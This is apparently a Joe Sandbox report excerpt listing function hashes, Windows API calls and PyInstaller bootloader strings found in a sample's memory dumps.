Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 7d27aca706c8b3b15e6ae6cd98469d3195d0be2623ca10ec2d3e3e7c85b3ab9c
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 71B15C7691CB8589E765EF29C09223CBBA0EB49B48F244135CE4E8739ACF39D441C754

Function 00007FF64488E570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: 80a0d4ff9bd2ba7e9eb951b00f1ed45b13507da800f8e2ebd29b2cd8550b9edc
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 5281AE72A0C6818AEA74FB19A48237A7A91FB95794F144235DE9DC3B9DDF3DE4408B00

Function 00007FF644896418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
Instruction ID: 5cd34181514acc371b20f9bedcb54223ccb6a422321c329250db926a89ba7f58
Opcode Fuzzy Hash: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
Instruction Fuzzy Hash: 8261F822E0CA52CEF775BA6894D267D6680AF50764F144239EE1ED3ADDDE7EE840C700

Function 00007FF644881D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: f459eb7dae979dbc3ecd0263c6ed20dcfcb6442fcb795606aecab63e8bcbde2a
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 1F51A176A1C6518AE764AB29C08133833A0EB55F69F244131DE4D97799CF3AE853C740

Function 00007FF644881944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: a9a52dad15665ebe83f7c2022cef886a2e6feab5dfdf2740c6a777984777af75
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 1451A576A1C6518AE725AB29C48133837A0EB44F59F244231CE8D9779DDF3AEC93C740

Function 00007FF644882164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 103ab3439aaadb8f76600ed15076b9e6bb99d8cd2095bca49c4fc77ff7519c17
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: A9518776A1C6518AE764AB29C495238B3A1FB54B68F344131CE4D977ECCF3AE853C740

Function 00007FF644881740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 15d7a2431a19d4a11f563d0ae4337632b161b1573d42efeca41746c3cf93aa4e
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 4D518F36B1C6558AE724BB29C08263837A1EB45B59F244135CE4D9779DCF3AE843D780

Function 00007FF644881F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: e134614954fca49dad51d0baf9bce4a700c13fd027659bdf171bbd0060c6b608
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 35517136A1C6558AE724BB29C08663877A1EB45F58F244131CE4D977AECF3AE853CB40

Function 00007FF644881B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: a136c9a90b7e75d368b308520257206d218f5c7a4f304e5a3b8ceec0bfcd4515
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: A9519076A1CA518AE724AF29C08133837A1EB95F59F285131CE4D9779CDF3AE843C740

Function 00007FF644885D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 118c6c495666db132ef6688ec05530d398dd55f10adc48d6584f92677ec574f0
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: A541C862C0E74A4DE9A9B91C09996B42B80DF13BE0D5853B4DD9DE73DFCD0DE986C201

Function 00007FF644889EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 09098bdc150ecd577935086e8df2098dbdc4635e590b0b11bcabf7468f67b9ce
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 7C41E532718A5586EF08EF2AD9A517973A1BB48FD0B499436EE0DD7B98DE3DD0428300

Function 00007FF6448880E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 923305a49ababe1563b277583e983548da1b4ed759a0ff6dbb759b2e35d4dbce
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 7D317132B1DF4289E664BB25688212E6AD5AB85BE0F144238EE5D93BDADF3CD4118704

Function 00007FF644899570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: e0b039f63cb060e6e073acdbf6d926b5242e0c39f773fb796735a2e7b2a2615b
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: 8EF0E1716187958E9BA8AF6DB44362A76D4F748384B949039E989C2A18DE3CD4518F04

Function 00007FF64487D30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: 9847bb88b6987a274be073067c321a2d3d5165845955afb24f1f013e2e8ef47f
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: 58A00121A0CC0AD8E648BB44A8E20252260FB94701F800032E80DA60A8AE2DE444D200

Function 00007FF644875830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875840
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875852
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875889
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487589B
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758B4
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758C6
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758DF
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758F1
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487590D
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487591F
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487593B
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487594D
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875969
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487597B
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875997
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759A9
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759C5
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759D7

Strings

PyConfig_SetWideStringList, xrefs: 00007FF644875A73, 00007FF644875A95
PyConfig_Read, xrefs: 00007FF6448759E9, 00007FF644875A0B
PyUnicode_FromString, xrefs: 00007FF644875F7B, 00007FF644875F9D
PyErr_Print, xrefs: 00007FF644875B59, 00007FF644875B7B
PyErr_Clear, xrefs: 00007FF644875AA1, 00007FF644875AC3
Py_ExitStatusException, xrefs: 00007FF6448758AA, 00007FF6448758CC
PyErr_Restore, xrefs: 00007FF644875B87, 00007FF644875BA9
PyUnicode_Replace, xrefs: 00007FF644875FD7, 00007FF644875FF9
PyUnicode_Decode, xrefs: 00007FF644875EF1, 00007FF644875F13
Py_Finalize, xrefs: 00007FF6448758D5, 00007FF6448758F7
PyErr_NormalizeException, xrefs: 00007FF644875AFD, 00007FF644875B1F
PyModule_GetDict, xrefs: 00007FF644875CC9, 00007FF644875CEB
PyConfig_SetBytesString, xrefs: 00007FF644875A17, 00007FF644875A39
PyStatus_Exception, xrefs: 00007FF644875E39, 00007FF644875E5B
PyConfig_Clear, xrefs: 00007FF64487598D, 00007FF6448759AF
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF644875DDD, 00007FF644875DFF
Failed to get address for %hs, xrefs: 00007FF644875861
PyRun_SimpleStringFlags, xrefs: 00007FF644875E0B, 00007FF644875E2D
PyConfig_InitIsolatedConfig, xrefs: 00007FF6448759BB, 00007FF6448759DD
PySys_GetObject, xrefs: 00007FF644875E67, 00007FF644875E89
PyImport_AddModule, xrefs: 00007FF644875BE3, 00007FF644875C05
Py_DecRef, xrefs: 00007FF644875836, 00007FF644875858
Py_InitializeFromConfig, xrefs: 00007FF644875903, 00007FF644875925
PyObject_SetAttrString, xrefs: 00007FF644875D81, 00007FF644875DA3
PyMem_RawFree, xrefs: 00007FF644875C9B, 00007FF644875CBD
PyConfig_SetString, xrefs: 00007FF644875A45, 00007FF644875A67
PyObject_Str, xrefs: 00007FF644875DAF, 00007FF644875DD1
PyEval_EvalCode, xrefs: 00007FF644875BB5, 00007FF644875BD7
PyImport_ImportModule, xrefs: 00007FF644875C3F, 00007FF644875C61
PyObject_GetAttrString, xrefs: 00007FF644875D53, 00007FF644875D75
PyMarshal_ReadObjectFromString, xrefs: 00007FF644875C6D, 00007FF644875C8F
PyUnicode_DecodeFSDefault, xrefs: 00007FF644875F1F, 00007FF644875F41
PyUnicode_FromFormat, xrefs: 00007FF644875F4D, 00007FF644875F6F
Py_PreInitialize, xrefs: 00007FF64487595F, 00007FF644875981
GetProcAddress, xrefs: 00007FF644875868
PyErr_Fetch, xrefs: 00007FF644875ACF, 00007FF644875AF1
PyErr_Occurred, xrefs: 00007FF644875B2B, 00007FF644875B4D
PyImport_ExecCodeModule, xrefs: 00007FF644875C11, 00007FF644875C33
Py_DecodeLocale, xrefs: 00007FF64487587F, 00007FF6448758A1
PyObject_CallFunction, xrefs: 00007FF644875CF7, 00007FF644875D19
Py_IsInitialized, xrefs: 00007FF644875931, 00007FF644875953
PyObject_CallFunctionObjArgs, xrefs: 00007FF644875D25, 00007FF644875D47
PyUnicode_Join, xrefs: 00007FF644875FA9, 00007FF644875FCB
PyUnicode_AsUTF8, xrefs: 00007FF644875EC3, 00007FF644875EE5
PySys_SetObject, xrefs: 00007FF644875E95, 00007FF644875EB7

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: e726b319f87fac86e657827f38232fe81a3e5d189886ae629ab4691b479018e6
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: F822A2A0A0DF47EAFB45FB55ACE257522A0BF94781F841435DC1E8266CEF3EF4599200

Function 00007FF6448781D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6448786B7,?,?,00000000,00007FF644873CBB), ref: 00007FF64487822C

Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF644878373
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF644878203
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF64487829D
%.*s, xrefs: 00007FF64487830C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6448782D9
\, xrefs: 00007FF644878261
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF644878240
CreateDirectory, xrefs: 00007FF64487837C

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 9c5d0225fd342e8fe4fe236ab1661b09eeb1239abcb5892c460514a2d240e855
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: 73517111B2CE4699FA50FB29ECE36BA62A0EF94784F445435DE0EC26DDEE3DE5048340

Function 00007FF644872180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6448721AB
SelectObject.GDI32 ref: 00007FF6448721F2
DrawTextW.USER32 ref: 00007FF644872215
SelectObject.GDI32 ref: 00007FF64487222B
ReleaseDC.USER32 ref: 00007FF64487223B
MoveWindow.USER32 ref: 00007FF64487228B
MoveWindow.USER32 ref: 00007FF6448722CB
MoveWindow.USER32 ref: 00007FF64487231E
MoveWindow.USER32 ref: 00007FF644872366

Strings

P%, xrefs: 00007FF6448721FF

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

